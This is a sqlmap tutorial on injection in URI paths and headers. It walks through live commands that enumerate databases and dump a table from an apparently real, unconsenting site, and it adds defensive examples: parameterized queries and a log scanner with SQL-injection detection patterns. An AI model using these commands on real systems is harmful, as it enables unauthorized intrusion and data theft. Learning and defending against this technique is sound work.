How to use sqlmap for injection in the address of a web site page (URI). Arbitrary injection points
URI injection point
Sometimes the injection point is inside the URI itself. For example, if we open http://youfio.ru/name/АГАФЬЯ.html, we see an ordinary web page.
If we add a quote to the URI, making it http://youfio.ru/name/АГАФЬЯ'.html, we see the familiar error:
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''АГАФЬЯ'') and message.ST<>0 ORDER BY message.DT DESC limit 0,20' at line 4
sqlmap does not perform any automatic test against URI paths, unless manually pointed to. You have to specify these injection points in the command line by appending an asterisk (*) (Note: Havij style %INJECT HERE% is also supported) after each URI point that you want sqlmap to test for and exploit a SQL injection.
This is particularly useful when, for instance, Apache web server's mod_rewrite module is in use or other similar technologies.
An example of valid command line would be:
sqlmap -u "http://targeturl/param1/value1*/param2/value2/"
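A rewritten path segment is exactly as dangerous as a query parameter because, as the error at the top of this article shows, the application receives it as a plain string and splices it into the SQL text. The following example is added here and is not code from the original article or from sqlmap: it simulates a mod_rewrite-style rule with a constructed route pattern and an in-memory SQLite table (the real site's rule, schema and names are not known, so they are all assumptions), and contrasts string concatenation, which fails on the quoted name just as the site did, with a bound parameter, which treats the quote as data. It also shows the request handler returning a generic message instead of echoing the DBMS error.

```python
import re
import sqlite3

# Constructed stand-in for a rewrite rule such as
#   RewriteRule ^name/(.+)\.html$ /name.php?name=$1
# (assumption: the real site's rule is not on the page).
ROUTE = re.compile(r"^/name/(?P<name>[^/]+)\.html$")


def route_to_param(path):
    """Return the 'name' value the rewrite rule would extract, or None if no match."""
    m = ROUTE.match(path)
    return m.group("name") if m else None


def make_db():
    """In-memory SQLite database with a constructed 'message' table (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE message (NAME TEXT, TXT TEXT, ST INTEGER, DT INTEGER)")
    con.executemany(
        "INSERT INTO message VALUES (?, ?, ?, ?)",
        [("agafya", "first", 1, 1), ("agafya", "second", 1, 2), ("ivan", "other", 1, 3)],
    )
    return con


def query_unsafe(con, name):
    """Vulnerable pattern: the path segment is concatenated into the SQL text.
    A single quote in 'name' breaks the statement, which is what the site's error shows."""
    sql = ("SELECT TXT FROM message WHERE (NAME='" + name + "') "
           "AND message.ST<>0 ORDER BY message.DT DESC LIMIT 0,20")
    return [row[0] for row in con.execute(sql)]


def query_safe(con, name):
    """Hardened pattern: the value is bound as a parameter; a quote is just data."""
    sql = ("SELECT TXT FROM message WHERE (NAME=?) "
           "AND message.ST<>0 ORDER BY message.DT DESC LIMIT 0,20")
    return [row[0] for row in con.execute(sql, (name,))]


def handle(path, safe=True):
    """Simulate one request: map the rewritten path to a parameter and run the query.
    Returns the result rows, "404" for an unmatched path, or a generic message when
    the query fails, so the DBMS error text is never sent back to the client."""
    name = route_to_param(path)
    if name is None:
        return "404"
    con = make_db()
    try:
        return (query_safe if safe else query_unsafe)(con, name)
    except sqlite3.Error:
        return "internal error"  # log the detail server-side; do not leak it


if __name__ == "__main__":
    print(handle("/name/agafya.html"))
    print(handle("/name/agafya'.html"))             # bound: empty result, no error
    print(handle("/name/agafya'.html", safe=False))  # concatenated: generic error
```

With the bound parameter the quoted name simply matches nothing; with concatenation the same request produces a syntax error, which a verbose error page would then hand to the tester complete with the query structure.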
Let us return to our target web site. To test that site the command should look like this:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html"
The program says:
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
That is, a custom injection marker ('*') was found in the '-u' option, and sqlmap asks whether to process it. We agree, because the marker is intentional.
Again the program asks:
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
Choose C, i.e. continue.
The program says:
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
Agree.
Again the question:
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
Choose whichever option you prefer.
The following lines report that a SQL injection vulnerability exists:
[17:21:15] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[17:21:15] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
By the way, in case you did not know, sqlmap now also runs a heuristic check for XSS.
Details about the vulnerability:
[17:22:05] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
And further:
[17:23:57] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
From here on it works just like an ordinary SQL injection in a vulnerable GET or POST parameter. We get the list of databases:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" --dbs
The server has the following databases:
available databases [2]:
[*] information_schema
[*] snicke_youfioru
We get the tables in the 'snicke_youfioru' database:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" -D 'snicke_youfioru' --tables
The list of tables:
We get the contents of the 'message' table:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" -D 'snicke_youfioru' -T 'message' --dump
Arbitrary injection point
Similar to the URI injection point, an asterisk (*) (Note: Havij style %INJECT HERE% is also supported) can also be used to mark an arbitrary injection point inside GET, POST or HTTP headers. The injection point can be specified by marking it inside the GET parameter value(s) provided with option -u, POST parameter value(s) provided with option --data, HTTP header value(s) provided with options -H, --headers, --user-agent, --referer and/or --cookie, or at a generic place inside an HTTP request loaded from file with option -r.
An example of valid command line would be:
sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
The asterisk can be used more than once, i.e. there may be several injection points, for example:
sqlmap -u "http://www.example.com/*-*"
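Because the marker can sit in the path, the query string, the referer, the user-agent or a cookie, a defender watching for this kind of testing has to look at every one of those fields rather than only at query parameters. The following example is added here and is not code from the original article or from sqlmap: it parses a few constructed combined-format access log lines (the hosts, timestamps and payload fragments are all made up for this example) and flags entries carrying the signals that correspond to the techniques reported above (a stray quote in a path segment, error-based FLOOR/RAND and time-based SLEEP/BENCHMARK fragments, a boolean test, and the default sqlmap user-agent), in whichever field they appear.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: host ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signals matching the techniques the article reports. Applied to every field after URL-decoding.
PAYLOAD_SIGNALS = [
    ("sqlmap user-agent", re.compile(r"sqlmap/", re.I)),
    ("boolean test", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("time-based payload", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based payload", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I)),
]

# Constructed sample log (not real traffic): a normal request, the quote probe from the
# article, a sqlmap run against the path, and a referer carrying a boolean test.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:17:21:15 +0000] "GET /name/agafya.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:17:21:16 +0000] "GET /name/agafya%27.html HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:17:22:05 +0000] "GET /name/agafya%27%20AND%20(SELECT%20FLOOR(RAND(0)*2))%20--%20.html HTTP/1.1" 500 310 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '198.51.100.4 - - [10/Oct/2023:17:23:57 +0000] "GET /name/ivan.html HTTP/1.1" 200 4100 "http://example.test/?id=1 AND 1=1" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a sorted list of (field, signal) pairs found in one parsed entry."""
    target = unquote_plus(entry["target"])          # sqlmap URL-encodes its payloads
    path, _, query = target.partition("?")
    fields = {
        "path": path,
        "query": query,
        "referer": unquote_plus(entry["referer"]),
        "user-agent": unquote_plus(entry["ua"]),
    }
    hits = set()
    if "'" in path:                                  # a quote never belongs in a rewritten path segment
        hits.add(("path", "quote in path segment"))
    for field, text in fields.items():
        for name, rx in PAYLOAD_SIGNALS:
            if rx.search(text):
                hits.add((field, name))
    return sorted(hits)


def scan(lines):
    """Return (host, raw target, hits) for every line carrying at least one signal."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append((entry["host"], entry["target"], hits))
    return findings


if __name__ == "__main__":
    for host, target, hits in scan(SAMPLE_LOG):
        print(host, target, hits)
```

The quote-in-path rule fires on the very first manual probe, before any tool is involved; the other rules pick up the automated phase. In practice the decoded fields should be fed to whatever alerting you already have, and the rule list extended to the DBMS actually behind the site.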